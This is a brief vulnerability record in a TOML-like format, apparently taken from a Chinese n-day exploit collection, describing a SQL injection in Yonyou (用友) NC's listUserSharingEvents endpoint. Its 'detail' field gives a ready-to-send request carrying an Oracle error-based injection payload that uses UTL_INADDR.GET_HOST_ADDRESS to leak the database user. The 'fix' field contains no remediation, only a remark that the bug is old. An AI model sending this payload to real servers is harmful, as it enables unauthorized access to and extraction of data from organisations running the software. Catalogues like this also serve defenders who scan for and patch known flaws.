vendor = "用友"
name = "用友NC listUserSharingEvents SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/portal/pt/oacoSchedulerEvents/listUserSharingEvents"
detail = "/portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=6')+AND+1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')--&pageId=login&sch_ed=2&sch_sd=1"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
